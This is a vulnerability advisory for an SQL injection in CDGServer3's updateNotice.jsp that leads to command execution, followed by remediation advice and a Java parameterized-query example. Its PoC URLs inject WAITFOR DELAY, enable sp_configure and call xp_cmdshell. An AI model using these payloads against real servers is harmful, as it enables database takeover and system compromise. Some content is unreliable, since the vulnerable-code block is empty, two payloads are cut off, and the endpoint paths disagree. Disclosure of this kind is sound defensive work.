### Key Information

#### Vulnerability Title

- **Unauthenticated SQLi Leading to Remote Code Execution (RCE)**

#### Vulnerability Overview

- An SQL injection vulnerability was discovered in the `id` parameter of the `updateNotice.jsp` endpoint.
- This vulnerability allows unauthenticated attackers to execute arbitrary code on the MSSQL server, potentially leading to full server compromise.

#### Affected Endpoint

- `CDGServer3/pubinfo/updateNotice.jsp`

#### Vulnerability Type

- RCE (Remote Code Execution)

#### Vulnerable Code

```java
```

#### Proof of Concept (PoC)

1. Time-based SQL Injection:

```
https://uri/CDGServer3/parameter/updateNotice.jsp?id=1';WAITFOR DELAY '0:0:10'--
```

2. Enable `xp_cmdshell`:

```
https://uri/CDGServer3/parameter/updateNotice.jsp?id=1';EXEC sp_configure 'show advanced option
```

3. Execute Arbitrary Commands:

```
https://uri/CDGServer3/parameter/updateNotice.jsp?id=1';exec master..xp_cmdshell 'ping fewfiew
```

#### Impact

- Full server compromise.
- Data leakage.
- Denial of Service (DoS) via execution of resource-intensive commands.
- Potential lateral movement within the internal network.

#### Recommendations

1. Input Validation and Sanitization: Ensure all user inputs are properly sanitized and validated. Use parameterized queries or prepared statements to prevent SQL injection.
2. Principle of Least Privilege: Ensure database users have only the minimum privileges required for application functionality.
3. Disable Dangerous Features: Disable features like `xp_cmdshell` unless absolutely necessary.
4. Regular Security Audits: Conduct regular security audits and code reviews to identify and remediate vulnerabilities.

#### Conclusion

- The RCE vulnerability in the `updateNotice.jsp` endpoint poses a significant security risk. Immediate remediation is required, including sanitizing user inputs and protecting the database from unauthorized access and code execution.
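As an added example (not code from this advisory or from the CDGServer3 product, whose source is not shown above), the following Java snippet illustrates Recommendation 1 for the `id` parameter of `updateNotice.jsp`: the request value is validated as a plain integer before any SQL is built, and the update runs through a `PreparedStatement` so the value is bound as data rather than spliced into the query text. The table and column names (`notice`, `id`, `title`, `content`) and the `NoticeUpdater` class are assumptions made for the example.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;

public final class NoticeUpdater {

    /** Thrown when the request parameter is not a well-formed notice id. */
    public static final class BadRequestException extends Exception {
        BadRequestException(String msg) { super(msg); }
    }

    /**
     * Parse the raw `id` query parameter. Anything other than a short
     * positive integer (for instance a value carrying a quote, a semicolon
     * or a comment marker) is rejected before any SQL is built.
     */
    static int parseNoticeId(String rawId) throws BadRequestException {
        if (rawId == null || !rawId.matches("\\d{1,9}")) {
            throw new BadRequestException("invalid notice id");
        }
        return Integer.parseInt(rawId);
    }

    /**
     * Update a notice with a parameterized statement. Table and column
     * names are assumed for this example. The `?` placeholders are bound
     * by the JDBC driver, so the caller's input is transmitted as values,
     * never as SQL text, and no second statement can be appended.
     */
    static int updateNotice(Connection conn, String rawId,
                            String title, String content)
            throws SQLException, BadRequestException {
        int id = parseNoticeId(rawId);
        String sql = "UPDATE notice SET title = ?, content = ? WHERE id = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, title);
            ps.setString(2, content);
            ps.setInt(3, id);
            return ps.executeUpdate(); // number of rows affected
        }
    }
}
```

Per Recommendation 2, the `Connection` passed in should authenticate as an application login that holds only UPDATE on the notice table and is not a member of `sysadmin`, so even a future injection flaw could not reach `sp_configure` or `xp_cmdshell`.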